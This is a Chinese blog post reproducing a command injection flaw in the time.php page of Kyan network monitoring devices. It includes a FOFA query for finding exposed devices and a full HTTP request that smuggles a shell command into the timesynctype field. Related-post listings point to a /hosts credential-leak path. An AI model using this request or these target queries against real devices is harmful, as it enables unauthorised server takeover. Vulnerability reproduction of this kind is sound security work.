Kyan网络监控设备time.php远程命令执行漏洞

已于 2024-03-11 21:40:21 修改
阅读量128 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-11 21:40:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43567873/article/details/136636171
Kyan网络监控设备的time.php存在远程命令执行漏洞,未经充分验证即可执行任意命令。配合潜在的账号密码泄露,攻击者可能获取服务器权限。修复建议包括更新官方发布的补丁进行系统升级。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞描述
Kyan 网络监控设备 time.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞,可以获取服务器权限,存在远程命令执行漏洞
fofa
app=”Kyan设计”
漏洞复现
登陆后访问/time.php,构造数据包执行命令

POST /time.php HTTP/1.1
Host: 
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=
Connection: close

timesynctype=%3Bid%3E1.txt

了解本专栏 订阅专栏 解锁全文 超级会员免费看
Kyan网络监控设备license.php远程命令执行漏洞(含批量验证poc)
weixin_43567873的博客
04-03 134
Kyan网络监控设备license.php远程命令执行漏洞(含批量验证poc)
漏洞复现|Kyan密码泄露/命令执行漏洞
失心少年
06-29 930
Kyan网络监控设备存在账号密码泄露漏洞,该漏洞是由于开发人员将记录账户密码的文件放到网站目录,攻击者可通过访问目录获取Kyan网络监控设备账号密码,进入控制后台。该系统存在密码泄露及多个远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
Kyan网络监控设备账号密码泄露漏洞
chaojixiaojingang
04-19 2031
1.漏洞描述 Kyan网络监控设备存在账号密码泄露漏洞,该漏洞是由于开发人员将记录账户密码的文件放到网站目录,攻击者可通过访问目录获取Kyan网络监控设备账号密码,进入控制后台。 2.网络资产查找 Fofa:title="platform - Login" 3.POC http://xxx.xxx.xxx.xxx/hosts 4.漏洞复现 1)访问Kyan网络监控设备登录页面 2)访问POC,获取账号密码 3)利用获取的账号密码可直接进入后台 ...
Kyan 网络监控设备 hosts 账号密码泄露漏洞
孤桜懶契
04-05 1283
漏洞描述 Kyan 网络监控设备 存在账号密码泄露漏洞,攻击者通过漏洞可以获得账号密码和后台权限 漏洞影响 s ✅Kyan 空间测绘 d ⭕title="platform - Login" 漏洞复现 ✅登陆页面如下 漏洞url http://127.0.0.1/hosts 个人博客 孤桜懶契:https://gylq.gitee.io/time ...
2024年网络安全最新【Shiro安全框架 一】 十分钟带你熟悉Shiro的认证机制
2401_84300128的博客
05-01 225
📢📢为了操作简便,在这里我就不使用数据库,
Kyan网络监控设备run.php远程命令执行漏洞(含批量验证poc)
weixin_43567873的博客
04-03 118
Kyan网络监控设备run.php远程命令执行漏洞(含批量验证poc)
Kyan网络监控设备module.php远程命令执行漏洞(含批量验证poc)
weixin_43567873的博客
04-03 104
Kyan网络监控设备module.php远程命令执行漏洞(含批量验证poc)
Kyan网络监控设备hosts账号密码泄露漏洞(含批量验证poc)
weixin_43567873的博客
04-03 234
Kyan网络监控设备hosts账号密码泄露漏洞(含批量验证poc)
网康NGFW下一代防火墙远程命令执行漏洞复现
xnxqwzy的博客
12-24 1103
2021HW期间,北京网康科技有限公司网康NGFW下一代防火墙被爆出远程命令执行漏洞。CNVD上还没查到漏洞编号,应该是CNVD还未公开该漏洞。但是网上已有人复现和漏洞分析的文章。网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙。但该NGFW存在远程命令执行漏洞,攻击者可通过构造特殊请求执行系统命令。
电子电气架构 --- 汽车网络安全概述
Soly_kun的博客
08-02 239
汽车网络安全面临严峻挑战,随着联网汽车的普及,攻击事件呈指数级增长。本文分析了汽车行业面临的六大网络安全威胁:欺骗、篡改、不可否认性、信息泄露、拒绝服务和权限提升。文章详细阐述了联网汽车的四大攻击层面(直接物理、间接物理、无线和传感器欺骗),并指出车辆内部多个功能单元都存在安全漏洞。作者提出构建嵌入式防火墙作为多层防护方案的核心,强调其需要具备高度可配置性和模块化特点,能够适应不同电子控制单元的运行环境。通过分析吉普切诺基攻击案例,文章论证了防火墙在检测可疑活动、屏蔽恶意IP方面的重要作用,为汽车网络安全
Web安全学习步骤
JQLvopkk的博客
08-01 669
Web安全学习步骤
2024年网络安全案例
JQLvopkk的博客
08-02 442
国家级APT | 零日漏洞+持久化控制 | 网络分段,敏感数据加密 || 勒索软件 | 双重勒索+供应链渗透 | 强制启用MFA,离线加密备份 |- 手法:利用管理服务器私钥漏洞,伪造签名调用合约`withdraw`函数提取多链资产(含稳定币、ETH、wBTC)。| 区块链漏洞 | 私钥管理失效+合约逻辑缺陷 | 多签冷钱包,第三方代码审计 |
网络安全专业知识体系:成为专家需要做的
zhangyihu321的专栏
08-01 682
成为顶级网络安全专家需要在技术深度、知识广度、实战经验、管理能力等多个维度达到较高水准。这不仅需要扎实的理论基础和过硬的技术技能,更需要敏锐的安全嗅觉、良好的沟通能力和持续的学习热情。网络安全是一个永远没有终点的领域,攻防技术在不断演进,新的威胁层出不穷。因此,持续学习、保持技术敏感度、紧跟行业发展趋势,是每一位志在成为顶级安全专家的专业人士必须具备的基本素质。
Kali Linux 2025.2基于MITRE ATT&CK框架
鹿鸣天涯
08-05 266
MITRE ATT&CK(Adversarial Tactics, Techniques, and Common Knowledge)是一个全球广泛认可的网络攻击技术知识库,详细记录了攻击者在不同阶段使用的策略和技术。通过将Kali Linux的工具菜单与ATT&CK框架对齐,开发团队让用户能够根据攻击链的不同阶段(如初始访问、执行、持久化、权限提升等)快速定位所需工具。这种设计不仅提高了工具查找的效率,还让红队和蓝队在实际操作中能够更好地模拟和防御真实世界的网络攻击。
网络安全及防御
Hzz_King的博客
08-01 217
输入用户名(admin)和密码(Admin@123)并修改初始密码。配置g1/0/0为dmz区域,g/1/0/1为trust区域。修改同一网段下ip并开启服务。修改时间为any,并ping。配置防火墙(FW1)
2025网络安全指南
雪兽软件
08-01 1179
网络安全是保护数字设备网络和敏感数据免受黑客攻击、恶意软件和钓鱼攻击等网络威胁的实践。它涉及一系列策略、技术和最佳实践,旨在保护计算机、网络和数据免受网络攻击。网络安全包括使用专门工具检测和清除有害软件,同时学习识别和避免网络诈骗。养成良好的网络安全习惯有助于保护个人数据隐私,确保安全的在线体验。它也被称为信息安全(INFOSEC)、信息保障(IA)或系统安全
假装情侣匿名聊天室:体验即刻式浪漫
08-05
资源下载链接为: https://pan.quark.cn/s/abbae039bf2a 用户端:无需注册,用户进入后随机匹配异性进入聊天室。系统会随机分配房间、情侣头像及聊天话题,用户可发送自定义图片,还能通过输入法键盘输入并发送 emoji。当聊天室倒计时快结束时,用户可选择延长房间时间。聊天内容会经过过滤处理。 后台管理端:登录后台管理地址,账号为 admin,密码为 admin。后台可实时监控聊天情况,上传情侣头像和创建聊天话题,查看各房间的聊天记录。 安装步骤:将 anonymous_chat.sql 文件导入到 mysql 数据库中。修改 Application/chat/config.php 文件。 运行方式: Windows 服务器:只需双击 .bat 文件即可启动。 Linux 服务器:进入项目根目录,在终端输入命令以 debug(调试)方式启动,命令为 php start.php s。 注意事项:服务端可放置在服务器的任意位置,只要能成功运行即可。该系统同时支持 Windows 服务器和 Linux 服务器,但两者的运行方法有所不同。
装修公司网络营销推广方案.pdf
最新发布
08-06
装修公司网络营销推广方案.pdf
夏色四叶草安卓版.apk
08-05
夏色四叶草安卓版.apk
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值